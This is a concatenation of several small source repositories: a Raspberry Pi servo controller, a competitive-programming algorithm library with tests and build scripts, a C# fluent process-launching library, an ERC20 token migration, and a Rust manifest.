<file_sep>#include <stdio.h>
#include <wiringPi.h>
int main(){
if (wiringPiSetupGpio() == -1) {
fprintf(stderr, "WiringPi Initialize Error\n");
return 0;
}
pinMode(18,PWM_OUTPUT);
pwmSetMode(PWM_MODE_MS);
pwmSetClock(375); // 19.2 MHz / 375 / 1024 = 50 Hz, the standard servo frame rate
pwmSetRange(1024);
while(1){
int num;
scanf("%i",&num);
printf("%d\n",num);
pwmWrite(18,num);
}
return 0;
}
<file_sep>class RobotMoveApp implements IApplication {
public void Start(){
Robot.Init();
System.out.println("Robot Ready !");
AudioLib.INSTANCE.play("TestMove.wav");
}
public void Quit(){
AudioLib.INSTANCE.play("EndTestMove.wav");
Robot.Stop();
Robot.Quit();
}
public void Update(){
}
public int Cleanup(){
System.out.println("Cleanup Robot...");
return 0;
}
public void Order(String word){
if(word.equals("front"))Robot.Move(FB.Front, 300);
if(word.equals("back"))Robot.Move(FB.Back, 300);
if(word.equals("left"))Robot.Turn(LR.Left, 300);
if(word.equals("right"))Robot.Turn(LR.Right, 300);
}
public boolean IsRunning(){
return true;
}
}
|
8cc4233b3511648867d315f02097fe430afa63c1
|
[
"Java",
"C",
"C++"
] | 48
|
C
|
urotanke95/RobotPrograms
|
f0f45f0072e801350e17f8ec60b5db3443928c4f
|
e2316771c0cb823eb88aad2cea94f7e183c2a838
|
refs/heads/master
|
<file_sep># code-library
[](https://travis-ci.com/nju-calabash/code-library)
[](https://codecov.io/gh/nju-calabash/code-library)
Standard Code Library for Competitive Programming Contests like ICPC
<file_sep>#include <bits/stdc++.h>
#define MAXN 5030
using namespace std;
#define Rep(i, n) for (int i = 1; i <= int(n); i++)
/*
%%%
title: Bipartite Matching
desc:
Maximum matching, minimum vertex cover and maximum independent set for
bipartite graph. All indices are 1-based. \par
Set \lstinline|n1, n2| and \lstinline|adj[i]|, then call \lstinline|matching()| to get the size of the maximum matching.
usage:
n1, n2: the size of left part and right part.
adj[i]: the neighborhood of left vertex $i$.
mx[i], my[i]: the right/left matched index of left/right vertex $i$, or 0 if the vertex is not matched.
%%%
*/
// +++
int n1, n2;
vector<int> adj[MAXN];
int mx[MAXN], my[MAXN];
int dx[MAXN], dy[MAXN];
bool vis[MAXN];
bool vx[MAXN], vy[MAXN];
void mark(int u) {
if (vx[u]) return;
vx[u] = true;
for (int v : adj[u]) if (v != mx[u]) {
vy[v] = true;
mark(my[v]);
}
}
bool find(int u) {
for (int v : adj[u]) {
if (!vis[v] && dy[v] == dx[u] + 1) {
vis[v] = true;
if (!my[v] or find(my[v])) {
mx[u] = v;
my[v] = u;
return true;
}
}
}
return false;
}
int matching() {
queue<int> q;
memset(mx, 0, sizeof(mx));
memset(my, 0, sizeof(my));
int ans = 0;
while (true) {
bool flag = false;
while (q.size()) q.pop();
memset(dx, 0, sizeof(dx));
memset(dy, 0, sizeof(dy));
Rep (i, n1) if (!mx[i]) q.push(i);
while (q.size()) {
int u = q.front(); q.pop();
for (int v : adj[u]) if (!dy[v]) {
dy[v] = dx[u] + 1;
if (my[v]) {
dx[my[v]] = dy[v] + 1;
q.push(my[v]);
} else flag = true;
}
}
if (!flag) break;
memset(vis, 0, sizeof(vis));
Rep (i, n1) if (!mx[i] && find(i)) ans++;
}
return ans;
}
//+++
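// Usage sketch for mark()/vx/vy, which this file defines but never calls: by
// Koenig's theorem the minimum vertex cover falls out of an alternating-path
// marking from the unmatched left vertices (my reading of the intended API,
// not code shipped with the library).
int koenig_cover_size() {
    int msize = matching();
    memset(vx, 0, sizeof(vx));
    memset(vy, 0, sizeof(vy));
    Rep (u, n1) if (!mx[u]) mark(u);
    // cover = {left u : !vx[u]} + {right v : vy[v]}; its size equals the
    // matching size, and the two complements form a maximum independent set.
    return msize;
}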
int main() {
n1 = 3, n2 = 2;
adj[1] = {1, 2};
adj[2] = {2};
assert(matching() == 2);
}
<file_sep>#include <bits/stdc++.h>
using namespace std;
#define rep(i, n) for (int i = 0; i < int(n); i++)
#define Rep(i, n) for (int i = 1; i <=int(n); i++)
#define range(x) begin(x), end(x)
typedef long long LL;
/*
%%%
title: Fast Polynomial Operations
desc: \lstinline|inverse|, \lstinline|log|, \lstinline|exp| are modulo $x^n$. \lstinline|operator *|, \lstinline|div| do not.
%%%
*/
extern const int mod;
LL powmod(LL b, LL e) {
LL r = 1;
while (e) {
if (e & 1) r = r * b % mod;
b = b * b % mod;
e >>= 1;
}
return r;
}
void printvec(const vector<int>& a) {
printf("[");
rep (i, a.size()) {
if (i) printf(", ");
printf("%d", a[i]);
}
printf("]\n");
}
// +++
#pragma GCC optimize("fast-math")
const int mod = 998244353;
namespace poly {
typedef complex<double> num;
int base = 1;
vector<num> roots = {0, 1};
vector<int> rev = {0, 1};
void ensure_base(int nbase) {
if (nbase <= base) return;
rev.resize(1<<nbase);
rep (i, 1<<nbase) rev[i] = (rev[i>>1]>>1)|((i&1)<<(nbase-1));
roots.resize(1<<nbase);
while (base < nbase) {
double angle = 2 * acos(-1) / (1 << (base + 1));
for (int i = 1 << (base - 1); i < (1 << base); i++) {
roots[i<<1] = roots[i];
roots[i<<1|1] = polar(1.0, angle*(2*i+1-(1<<base)));
}
base++;
}
}
void fft(vector<num> &a, int n = -1) {
if (n < 0) n = a.size();
assert((n & (n - 1)) == 0);
int zeros = __builtin_ctz(n), sh = base - zeros;
ensure_base(zeros);
rep (i, n) if (i < (rev[i]>>sh)) swap(a[i], a[rev[i]>>sh]);
for (int k = 1; k < n; k <<= 1) {
for (int i = 0; i < n; i += 2*k) {
for (int j = 0; j < k; j++) {
num z = a[i+j+k] * roots[j+k];
a[i+j+k] = a[i+j]-z;
a[i+j] += z;
}
}
}
}
vector<int> multiply(const vector<int>& a, const vector<int>& b) {
int sz = a.size() + b.size() - 1;
vector<int> ret(sz);
int nbase = 0;
while ((1 << nbase) < sz) nbase++;
ensure_base(nbase);
sz = 1 << nbase;
vector<num> fa(sz);
rep (i, a.size()) fa[i].real(a[i]);
rep (i, b.size()) fa[i].imag(b[i]);
fft(fa);
num r(0, -0.25 / sz);
for (int i = 0; i <= (sz >> 1); i++) {
int j = (sz - i) & (sz - 1);
num z = (fa[j] * fa[j] - conj(fa[i] * fa[i])) * r;
if (i != j) fa[j] = (fa[i] * fa[i] - conj(fa[j] * fa[j])) * r;
fa[i] = z;
}
fft(fa);
rep (i, ret.size()) ret[i] = llround(real(fa[i]));
return ret;
}
vector<int> operator * (const vector<int>& a, const vector<int>& b) {
int sz = a.size() + b.size() - 1;
vector<int> res(sz);
int nbase = 0;
while ((1 << nbase) < sz) nbase++;
ensure_base(nbase);
sz = 1 << nbase;
vector<num> fa(sz), fb(sz);
rep (i, a.size()) {
int x = (a[i] % mod + mod) % mod;
fa[i] = num(x & ((1<<15)-1), x >> 15);
}
fft(fa);
rep (i, b.size()) {
int x = (b[i] % mod + mod) % mod;
fb[i] = num(x & ((1<<15)-1), x >> 15);
}
fft(fb);
double ratio = 0.25 / sz;
for (int i = 0; i <= (sz >> 1); i++) {
int j = (sz - i) & (sz - 1);
num ra[2], rb[2];
rep (s, 2) {
num a1 = (fa[i] + conj(fa[j])),
a2 = (fa[i] - conj(fa[j])) * num(0, -1),
b1 = (fb[i] + conj(fb[j])) * ratio,
b2 = (fb[i] - conj(fb[j])) * num(0, -ratio);
ra[s] = a1 * b1 + a2 * b2 * num(0, 1);
rb[s] = a1 * b2 + a2 * b1;
swap(i, j);
}
rep (s, 2) fa[j] = ra[s], fb[j] = rb[s], swap(i, j);
}
fft(fa); fft(fb);
rep (i, res.size())
res[i] = (llround(real(fa[i])) +
(llround(real(fb[i])) % mod << 15) +
(llround(imag(fa[i])) % mod << 30)) % mod;
return res;
}
vector<int> inverse(const vector<int> &a, int n = -1) {
assert(a[0]);
if (n < 0) n = a.size();
if (n == 1) return {(int)powmod(a[0], mod - 2)};
auto ret = inverse(a, (n + 1) >> 1), fa = ret * ret * a, fb = ret;
ret.resize(n); fb.resize(n); fa.resize(n);
rep (i, n) ret[i] = ((fb[i] + fb[i] - fa[i]) % mod + mod) % mod;
return ret;
}
vector<int> diff(const vector<int>& a) {
vector<int> ret(a.size());
Rep (i, a.size() - 1) ret[i-1] = 1ll * a[i] * i % mod;
return ret;
}
vector<int> integrate(const vector<int>& a) {
static vector<int> inv = {0, 1};
int n = a.size(); inv.reserve(n);
vector<int> ret(n);
for (int i = inv.size(); i < n; i++)
inv.push_back((mod - 1ll * inv[mod % i] * (mod / i) % mod) % mod);
for (int i = n - 1; i; i--) ret[i] = 1ll * a[i-1] * inv[i] % mod;
return ret;
}
vector<int> log(const vector<int> &a) {
assert(a[0] == 1);
auto ret = diff(a) * inverse(a);
ret.resize(a.size());
return integrate(ret);
}
vector<int> exp(const vector<int> &a, int n = -1) {
assert(a[0] == 0);
if (n < 0) n = a.size();
if (n == 1) return {1};
auto ret = exp(a, (n+1)>>1); ret.resize(n);
auto ff = log(ret); for (int& x : ff) if (x) x = mod - x;
ff[0] = (ff[0] + 1) % mod;
rep (i, n) ff[i] = (ff[i] + a[i]) % mod;
ret = ret * ff; ret.resize(n);
return ret;
}
// quotient remainder
pair<vector<int>, vector<int>>
div(const vector<int> &a, const vector<int> &b) {
int n = a.size(), m = b.size();
if (n < m) return {vector<int>{0}, a};
auto tmp = b; reverse(range(tmp));
tmp = inverse(tmp, n - m + 1);
auto rev = a; reverse(range(rev));
auto q = tmp * rev; q.resize(n - m + 1); reverse(range(q));
auto t = b * q;
vector<int> r(m - 1);
rep (i, m - 1) r[i] = (a[i] - t[i] + mod) % mod;
return {q, r};
}
}
// +++
int main() {
using namespace poly;
typedef vector<int> Poly;
// Multiplication
assert((Poly{1, 2, 3} * Poly{3, 4} == Poly{3, 10, 17, 12}));
// Inverse
assert((inverse(Poly{1, 7, 4, 9, 8}) ==
Poly{1, 998244346, 45, 998244057, 1947}));
// Differentiate
assert((diff(Poly{2, 4, 5, 6}) == Poly{4, 10, 18, 0}));
// Integrate
assert((integrate(Poly{4, 6, 18, 12, 0}) == Poly{0, 4, 3, 6, 3}));
// Log
assert((log(Poly{1, 6, 4, 0}) == Poly{0, 6, 998244339, 48}));
// Exp
assert((exp(Poly{0, 3, 6, 1}) == Poly{1, 3, 499122187, 499122200}));
// Division
assert(div(Poly{3, 3, 1}, Poly{1, 1}) == make_pair(Poly{2, 1}, Poly{1}));
}
<file_sep>#include <bits/stdc++.h>
using namespace std;
#define rep(i, n) for (int i = 0; i < int(n); i++)
#define Rep(i, n) for (int i = 1; i <=int(n); i++)
#define range(x) begin(x), end(x)
#ifdef __LOCAL_DEBUG__
#define _debug(fmt, ...) fprintf(stderr, "[%s] " fmt "\n", __func__, ##__VA_ARGS__)
#else
#define _debug(...) ((void) 0)
#endif
typedef long long LL;
/*
%%%
title: Segment Tree with Dynamic Node Allocation
usage:
init(l, r): initialize the tree in range $[l, r)$
add(l, r, v): add $v$ to range $[l, r)$
sum(l, r): return the sum in range $[l, r)$
%%%
*/
// +++
const int MAXN = (1 << 17) * 20;
int lbnd, rbnd, sz;
int lson[MAXN], rson[MAXN];
LL val[MAXN], tag[MAXN];
inline int alloc() {
lson[sz] = rson[sz] = val[sz] = tag[sz] = 0;
return sz++;
}
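// GNU "?:" extension: lazily allocate a child node the first time it is
// touched, caching its index back into the tree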
#define lson (lson[o] = lson[o] ?: alloc())
#define rson (rson[o] = rson[o] ?: alloc())
void init(int l, int r) {
lbnd = l; rbnd = r; sz = 2;
}
void pull(int o) {
val[o] = val[lson] + val[rson];
}
void fadd(LL x, int o, int ll, int rr) {
val[o] += x * (rr - ll);
tag[o] += x;
}
void push(int o, int ll, int rr) {
int mm = (ll + rr) / 2;
fadd(tag[o], lson, ll, mm);
fadd(tag[o], rson, mm, rr);
tag[o] = 0;
}
void add(int l, int r, LL v, int o = 1, int ll = lbnd, int rr = rbnd) {
if (l <= ll and rr <= r) return fadd(v, o, ll, rr);
int mm = (ll + rr) / 2;
push(o, ll, rr);
if (mm > l) add(l, r, v, lson, ll, mm);
if (mm < r) add(l, r, v, rson, mm, rr);
pull(o);
}
LL sum(int l, int r, int o = 1, int ll = lbnd, int rr = rbnd) {
if (l <= ll and rr <= r) return val[o];
int mm = (ll + rr) / 2;
push(o, ll, rr);
if (r <= mm) return sum(l, r, lson, ll, mm);
if (l >= mm) return sum(l, r, rson, mm, rr);
return sum(l, r, lson, ll, mm) + sum(l, r, rson, mm, rr);
}
// +++
int main() {
init(1, 6);
add(1, 2, 1);
add(2, 3, 5);
add(3, 4, 4);
add(4, 5, 2);
add(5, 6, 3);
assert(sum(2, 5) == 11);
add(2, 4, 2);
assert(sum(3, 5) == 8);
add(1, 6, 1);
assert(sum(1, 5) == 20);
return 0;
}
<file_sep>#!/bin/bash
./script/extract.py +++ "$1"
<file_sep>.DEFAULT_GOAL = tex
.PHONY : tex test clean
TEX_SRCS=$(shell find src tex -type f)
build/tex/code.tex : $(TEX_SRCS) script/*
mkdir -p $(dir $@)
./script/make-tex.py > build/tex/code.tex
build/tex/main.pdf : $(TEX_SRCS) script/* build/tex/code.tex
mkdir -p $(dir $@)
cp -r tex build/
cd build/tex && xelatex main.tex
cd build/tex && xelatex main.tex
tex : build/tex/main.pdf
xdg-open $<
SRC_CODES = $(shell ./script/get-srclist.py)
SRC_TARGETS = $(SRC_CODES:src/%.cpp=build/%.exec)
CXX ?= g++
CXXFLAGS = -Wall -std=c++14 -ggdb
CXXFLAGS += -fsanitize=undefined,address
GCOV ?= gcov
build/%.exec: src/%.cpp
@echo + [CXX] $@
@mkdir -p $(dir $@)
@cd $(dir $@) && $(CXX) $(CXXFLAGS) -ftest-coverage -fprofile-arcs ../../$< -o $(notdir $@)
build/%.gcda : build/%.exec src/%.cpp
@echo + [GCOV] $@
@cd $(dir $@) && ./$(notdir $<)
@cd $(dir $@) && $(GCOV) -n -o $(notdir $@) $(notdir $(word 2,$^)) > /dev/null
test : $(SRC_CODES:src/%.cpp=build/%.gcda) build/tex/code.tex
clean :
rm -rf build
.DELETE_ON_ERROR:
<file_sep>#!/bin/bash
sudo apt update
sudo apt install python3-pip
sudo pip install oyaml
sudo pip3 install oyaml
<file_sep>#!/usr/bin/env python3
import re, os, hashlib, sys
import subprocess
import oyaml as yaml
LANGS = {'c': 'C', 'cpp': 'C++', 'py': 'Python', 'java': 'Java'}
def digest(s) :
return hashlib.md5(re.sub(r'\s|//.*', '', s).encode('utf8')).hexdigest()[-4:]
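# digest() above: 4-hex-digit fingerprint of a line with whitespace and
# // comments stripped; fed to \createlinenumber below so every printed code
# line gets a stable id that survives reformatting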
line_cnt = 0
recipe = yaml.load(open('recipe.yml').read(), Loader = yaml.SafeLoader)
for cat, ls in recipe.items() :
print('\\section{%s}' % cat.replace('_', ' ').title())
for fn in ls :
filename = 'src/' + cat + '/' + fn
ext = fn.split('.')[-1]
meta = yaml.load(
subprocess.check_output(['./script/extract.py', '%%%', filename]),
Loader = yaml.SafeLoader
)
code = subprocess.check_output(['./script/extract-src.sh', filename]).decode('utf8')
title = meta['title']
desc = meta.get('desc', None)
usage = meta.get('usage', None)
sect = [ '\\subsection{%s}' % title ]
if desc :
sect.append(desc.strip())
sect.append('')
if usage :
sect.append('\\textbf{Usage:}\\par')
sect.append('\\begin{tabular}{p{3.5cm} p{8cm}}')
for funct, descript in usage.items() :
sect.append('\\lstinline|{0}| & {1} \\\\'.format(funct, descript))
sect.append('\\end{tabular}')
for line in code.split('\n'):
sect.append('\\createlinenumber{%d}{%s}' % (line_cnt, digest(line)))
line_cnt += 1
sect.append('\\begin{lstlisting}[language=%s]' %
LANGS.get(ext, '{}a').lower())
sect.append(code)
sect.append('\\end{lstlisting}')
print('\n'.join(sect))
<file_sep>/*
%%%
title: Nim Multiplication
author: Roundgod
%%%
*/
#include <bits/stdc++.h>
using namespace std;
// +++
int nim_mult_pow(int x, int y) {
if (x < 2) return x & y;
int m = 1;
while (x >= 1 << (m << 1)) m <<= 1;
int p = x >> m, s = y >> m, t = y & ((1 << m) - 1);
int d1 = nim_mult_pow(p, s);
int d2 = nim_mult_pow(p, t);
return ((d1 ^ d2) << m) ^ nim_mult_pow(1 << (m - 1), d1);
}
int nim_mult(int x, int y) {
if (x < y) swap(x, y);
if (x < 2) return x & y;
int m = 1;
while (x >= 1 << (m << 1)) m <<= 1;
int p = x >> m, q = x & ((1 << m) - 1);
int s = y >> m, t = y & ((1 << m) - 1);
int c1 = nim_mult(p, s);
int c2 = nim_mult(p, t) ^ nim_mult(q, s);
int c3 = nim_mult(q, t);
return ((c1 ^ c2) << m) ^ c3 ^ nim_mult_pow(1 << (m - 1), c1);
}
// +++
int main() {
assert(nim_mult(0, 0) == 0);
assert(nim_mult(0, 3) == 0);
assert(nim_mult(0, 5) == 0);
assert(nim_mult(1, 1) == 1);
assert(nim_mult(4, 7) == 10);
assert(nim_mult(9, 6) == 1);
assert(nim_mult(4, 8) == 11);
}
<file_sep>#!/usr/bin/env python3
import sys
if len(sys.argv) > 2 : sys.stdin = open(sys.argv[2], 'r')
text = sys.stdin.readlines()
ls = []
for i, s in enumerate(text) :
if sys.argv[1] in s : ls.append(i)
if len(ls) != 2 :
sys.stderr.write('Illegal number of indicators ({0})!\n'.format(len(ls)))
exit(1)
ls[0] += 1
while ls[0] < ls[1] and text[ls[0]].strip() == '\n' : ls[0] += 1
while ls[0] < ls[1] and text[ls[1]-1].strip() == '\n' : ls[1] -= 1
sys.stdout.write(''.join(text[ls[0] : ls[1]]))
<file_sep>#!/usr/bin/env python3
import oyaml as yaml
recipe = yaml.load(open('recipe.yml').read(), Loader=yaml.SafeLoader)
for cat, ls in recipe.items() :
for fn in ls :
print('src/' + cat + '/' + fn)
<file_sep>/*
%%%
title: Basic Geometry Template
author: sy_chen
%%%
*/
#pragma GCC optimize("fast-math")
#include <bits/stdc++.h>
using namespace std;
#define rep(i, n) for (int i = 0; i < int(n); i++)
#define Rep(i, n) for (int i = 1; i <=int(n); i++)
#define range(x) begin(x), end(x)
// +++
typedef double T;
inline int fcmp(T a, T b = 0) {
if (fabs(a - b) < 1e-9) return 0; // add EPS if necessary
return a < b ? -1 : 1;
}
// Point
typedef complex<T> pt, vec;
inline pt operator ^ (pt a, pt b) { return a * b; } // complex multiplication
// (declared before the cross-product overload below, so "*" here is std::complex's)
inline T operator , (pt a, pt b) // dot product (overloads the comma operator)
{ return real(a) * real(b) + imag(a) * imag(b); }
inline T operator * (pt a, pt b) // cross product
{ return real(a) * imag(b) - imag(a) * real(b); }
inline bool operator == (pt a, pt b) { return fcmp(abs(a - b)) == 0; }
// >0: in order, <0: out of order, =0: nonstandard
inline int rotOrder(vec a, vec b, vec c) {
return fcmp(double(a*b) * (b*c));
}
pt unit(pt x) { return x / abs(x); }
// Segment
typedef pair<pt, pt> seg;
inline bool operator & (seg s, pt p) { // pt in seg
vec v1 = s.first - p, v2 = s.second - p;
return (v1, v2) <= 0 and v1 * v2 == 0;
}
T distance(pt p, seg S) {
pt s, t; tie(s, t) = S;
if (fcmp((p - s, t - s)) <= 0) return abs(p - s);
if (fcmp((p - t, s - t)) <= 0) return abs(p - t);
return abs((s - p) * (t - p)) / abs(s - t);
}
T distance(seg S, seg T) {
return min({distance(S.first, T), distance(S.second, T),
distance(T.first, S), distance(T.second, S)});
}
inline bool nIntRectRect(seg a, seg b) { // do the bounding boxes overlap?
rep (i, 2) {
if (max(real(a.first), real(a.second)) <
min(real(b.first), real(b.second))) return false;
if (max(imag(a.first), imag(a.second)) <
min(imag(b.first), imag(b.second))) return false;
swap(a, b);
}
return true;
}
inline bool operator & (seg a, seg b) { // seg seg intersection
if (!nIntRectRect(a, b)) return false;
return rotOrder(b.first-a.first, a.second-a.first, b.second-a.first) >= 0 &&
rotOrder(a.first-b.first, b.second-b.first, a.second-b.first) >= 0;
}
inline pt getIntersection(pt P, vec v, pt Q, vec w) { // line line intersection
return P + v * (w * (P - Q) / (v * w));
}
inline pt project(pt p, seg S) { // project p to line s
pt s, t; tie(s, t) = S;
double r = (t - s, p - s) / norm(t - s);
return s + r * (t - s);
}
// Polygon
struct polygon : vector<pt> {
pt& get(int id) {
while (id < 0) id += size();
while (id >= size()) id -= size();
return at(id);
}
pt& operator [] (int id) { return get(id); }
seg getseg(int id) { // {pts[id], pts[id+1]}
return {get(id), get(id+1)};
}
// Make convex hull from a set of points.
// The result starts from the point with minimum x (and minimum y if
// multiple) and is in counterclockwise order. If you want non-strict
// convex hull, change all <= into <.
void make_hull(vector<pt> pts) {
sort(pts.begin(), pts.end(), [] (pt a, pt b) {
return make_pair(real(a), imag(a)) < make_pair(real(b), imag(b));
});
int k = 0;
resize(pts.size()*2);
for (int i = 0; i < pts.size(); i++) {
while (k > 1 and (at(k-1)-at(k-2)) * (pts[i]-at(k-1)) <= 0) k--;
at(k++) = pts[i];
}
for (int i = pts.size() - 2, t = k; i >= 0; i--) {
while (k > t and (at(k-1)-at(k-2)) * (pts[i]-at(k-1)) <= 0) k--;
at(k++) = pts[i];
}
resize(k-1);
}
bool operator & (pt p) {
int wn = 0;
rep (i, size()) {
if (make_pair(get(i), get(i+1)) & p) return true; // on the border
int d1 = fcmp(imag(get(i)), imag(p));
int d2 = fcmp(imag(get(i+1)), imag(p));
int k = fcmp((get(i+1) - get(i)) * (p - get(i)));
if (k > 0 and d1 <= 0 and d2 > 0) wn++;
if (k < 0 and d2 <= 0 and d1 > 0) wn--;
}
return wn;
}
bool convex_contain(pt p) { // non-strict, passed "SPOJ INOROUT"; not exercised by main() below -- verify its orientation convention before relying on it
auto qs = [&] (int x) { return at(x) - front(); };
vec q = back() - front(); p -= front();
if (rotOrder(p, qs(1), q) < 0) return false;
int l = 0, r = size() - 1;
while (l + 1 < r) {
int m = (l + r) / 2;
if (rotOrder(p, qs(m), q)) l = m; else r = m;
}
if (l == 0) return false;
vec lp = qs(l), rp = qs(r);
return fcmp(fabs(lp * p) + fabs(p * rp) + fabs((rp - lp) * (p - lp)),
lp * rp) == 0;
}
};
// +++
void class_test() {
pt x; x = polar(1.0, 0.0);
assert(arg(x) == 0);
x = 0;
}
void point_test() {
assert(pt(1, 2) + pt(2, 3) == pt(3, 5));
assert(pt(2, 4) - pt(1, 6) == pt(1, -2));
pt x(1, 2);
x += pt(2, 4); assert(x == pt(3, 6));
x *= 2; assert(x == pt(6, 12));
x /= 2; assert(x == pt(3, 6));
x -= pt(3, 4); assert(x == pt(0, 2));
assert((pt(1, 2), pt(2, 3)) == 8);
assert((pt(1, 2) * pt(-5, 3)) == 13);
assert(getIntersection({0, 0}, {1, 1}, {2, 0}, {0, 1}) == pt(2, 2));
assert(project(pt(0, 2), make_pair(pt(0, 0), pt(2, 2))) == pt(1, 1));
assert(fcmp(distance(pt(0, 0), {pt(3, 4), pt(3, 5)}), 5) == 0);
assert(fcmp(distance(pt(0, 0), {pt(3, 5), pt(3, 4)}), 5) == 0);
assert(fcmp(distance(pt(1, 1), {pt(0, 0), pt(0, 2)}), 1) == 0);
}
void polygon_test() {
polygon a;
a.emplace_back(1, 2);
a.emplace_back(2, 3);
a.emplace_back(3, 4);
assert((a == vector<pt>{{1, 2}, {2, 3}, {3, 4}}));
assert(a.get(-1) == pt(3, 4));
assert(a.get(1) == pt(2, 3));
assert(a.get(3) == pt(1, 2));
a.make_hull(vector<pt>{{0, 0}, {0, 1}, {1, 1}, {1, 0}, {0.5, 0.5}, {0, 0.5}});
assert((a == vector<pt>{{0, 0}, {1, 0}, {1, 1}, {0, 1}}));
assert((a & pt{0.5, 0.5}) == true);
assert((a & pt{0, 0.5}) == true);
assert((a & pt{1, 2}) == false);
}
int main() {
class_test();
point_test();
polygon_test();
return 0;
}
|
2ef6256735de73244c0f17f276aecb637049c012
|
[
"Markdown",
"Makefile",
"Python",
"C++",
"Shell"
] | 12
|
Markdown
|
nju-calabash/code-library
|
5db8e05c9fa415cb0b0191e75dc62bd1e0445b4e
|
5a104b6b7a8d4d66d7289a45438b18675b4e2be1
|
refs/heads/master
|
<repo_name>tjaart/fluent-proc<file_sep>/FluentProc/ProcessRunner.cs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
namespace Tests
{
public class ProcessRunner
{
public ProcessRunner(string processPath)
{
ProcessPath = processPath;
}
public Action<int>? ExitHandler { get; set; }
public Action<string>? DataHandler { get; set; }
public string ProcessPath { get; }
public List<string> Args { get; set; } = new List<string>();
public RunningProcess Run()
{
var process = new Process
{
StartInfo =
{
UseShellExecute = false,
FileName = ProcessPath
}, EnableRaisingEvents = true
};
process.StartInfo.RedirectStandardOutput = true;
process.OutputDataReceived += (sender, args) =>
{
// args.Data is null at end-of-stream, and DataHandler may never have been set
if (args.Data != null) DataHandler?.Invoke(args.Data);
};
process.StartInfo.Arguments = string.Join(' ', Args);
if (ExitHandler != null)
{
process.Exited += (sender, args) => { ExitHandler(process.ExitCode); };
}
process.Start();
process.BeginOutputReadLine();
return new RunningProcess(process);
}
}
}<file_sep>/FluentProc/ArgumentHelper.cs
namespace Tests
{
public class ArgumentHelper
{
private readonly string _argument;
public ArgumentHelper(string argument)
{
_argument = argument;
}
public string SanitizeArgument()
{
var finalArg = _argument;
finalArg = QuoteArgumentWithSpaces(finalArg);
return finalArg;
}
private string QuoteArgumentWithSpaces(string argument)
{
if (argument.Contains(" "))
{
return $"\"{argument}\"";
}
return argument;
}
}
}<file_sep>/FluentProc/ProcessBuilder.cs
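// Usage sketch (my illustration, not part of the library's tests):
//   new ArgumentHelper("my file.txt").SanitizeArgument()  // -> "\"my file.txt\""
//   new ArgumentHelper("plain").SanitizeArgument()        // -> "plain"
// Note that only spaces trigger quoting; embedded quotes are not escaped.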
using System;
using System.Collections.Generic;
using System.IO;
namespace Tests
{
public class ProcessBuilder
{
private readonly string _processPath;
private Action<int>? _exitHandler;
private readonly List<string> _args = new List<string>();
private Action<string>? _dataHandler;
private ProcessBuilder(string processPath)
{
_processPath = processPath;
}
public static ProcessBuilder Create(string processPath)
{
return new ProcessBuilder(processPath);
}
public ProcessBuilder HandleExit(Action<int> exitHandler)
{
_exitHandler = exitHandler;
return this;
}
public ProcessBuilder Arg(in string argument)
{
if (_args.Contains(argument))
{
return this;
}
_args.Add( new ArgumentHelper(argument).SanitizeArgument());
return this;
}
public ProcessBuilder HandleOutput(Action<string> handleDataAction)
{
_dataHandler = handleDataAction;
return this;
}
public ProcessRunner Build()
{
return new ProcessRunner(_processPath)
{
ExitHandler = _exitHandler,
DataHandler = _dataHandler,
Args = _args,
};
}
}
}<file_sep>/Tests/ProcessBuilderTests.cs
using System.Collections.Immutable;
using System.Text;
using System.Threading.Tasks;
using Xunit;
namespace Tests
{
public class ProcessBuilderTests
{
[Fact]
public void TestRunTaskWithNormalExitCode()
{
var exitCode = -100;
var proc = ProcessBuilder.Create("ls")
.HandleExit(code =>
{
exitCode = code;
})
.Build();
var runningProcess = proc.Run();
runningProcess.WaitForExit();
Assert.Equal(0, exitCode);
}
[Fact]
public void TestRunTaskWithOutput()
{
var outputStr = new StringBuilder();
var proc = ProcessBuilder.Create("ls")
.Arg("/").Arg("-l")
.HandleExit(code =>
{
var exitCode = code;
})
.HandleOutput(s => { outputStr.AppendLine(s); })
.Build();
var runningProcess = proc.Run();
runningProcess.WaitForExit();
var final = outputStr.ToString();
Assert.True(final.Length > 0);
}
[Fact]
public void TestRunTaskWithArgument()
{
var exitCode = -100;
var proc = ProcessBuilder.Create("ls")
.Arg("/")
.HandleExit(code =>
{
exitCode = code;
})
.Build();
var runningProcess = proc.Run();
runningProcess.WaitForExit();
Assert.Equal(0, exitCode);
}
[Fact]
public async Task TestRunTaskWithAsyncWait()
{
var exitCode = -100;
var proc = ProcessBuilder.Create("ls")
.HandleExit(code =>
{
exitCode = code;
})
.Build();
var runningProcess = proc.Run();
await runningProcess.WaitForExitAsync();
Assert.Equal(0, exitCode);
}
}
}<file_sep>/FluentProc/RunningProcess.cs
using System;
using System.Diagnostics;
using System.Threading.Tasks;
namespace Tests
{
public class RunningProcess
{
private readonly Process _process;
private Task? _waitingTask;
public RunningProcess(Process process)
{
_process = process;
}
public void WaitForExit(TimeSpan? timeOut = null)
{
if (timeOut == null)
{
timeOut = TimeSpan.FromSeconds(10);
}
Task.Delay(timeOut.Value).ContinueWith(task => { if (!_process.HasExited) _process.Kill(); }); // kill only if still running when the watchdog fires
_process.WaitForExit();
}
public Task WaitForExitAsync(TimeSpan? timeOut = null)
{
if (_waitingTask == null)
{
_waitingTask = Task.Factory.StartNew(() => { WaitForExit(timeOut); });
}
return _waitingTask;
}
}
}
|
19f46fea96f00c566399e8e65c30e4dcf410e3f3
|
[
"C#"
] | 5
|
C#
|
tjaart/fluent-proc
|
327608ad06a7e4c9d7888d502d79c102ad886afa
|
30802a5ea2702a027ba4a500245720b8bde22803
|
refs/heads/master
|
<file_sep>
module.exports = {
"server": {
"baseDir": ["./src", "./build/contracts"]
},
"port": process.env.PORT || 3000,
"open" : false
}
<file_sep>var ZainCoin = artifacts.require("ZainCoin");
module.exports = function(deployer) {
deployer.deploy(ZainCoin);
}<file_sep># zaincoin
Simple implementation of erc20 for my friends
|
f7de74588159222f1de528099ab7280604634ddd
|
[
"JavaScript",
"Markdown"
] | 3
|
JavaScript
|
sprect8/zaincoin
|
fa3410d846130b4ad92d2a48f60419ac2b905eb2
|
0a752b499d01f618e2e8e8ee5edbdfb6a356c6b3
|
refs/heads/master
|
<repo_name>fanzeyi/castform<file_sep>/Cargo.toml
[package]
name = "castform"
version = "0.1.0"
authors = ["<NAME> <<EMAIL>>"]
[dependencies]
actix = "0.7"
actix_derive = "0.3"
actix-web = "*"
clap = "*"
failure = "0.1"
futures = "0.1"
hyper = "0.12"
hyper-tls = "0.3"
http = "0.1"
serde = "1.0"
serde_derive = "1.0"
serde_json = "1.0"
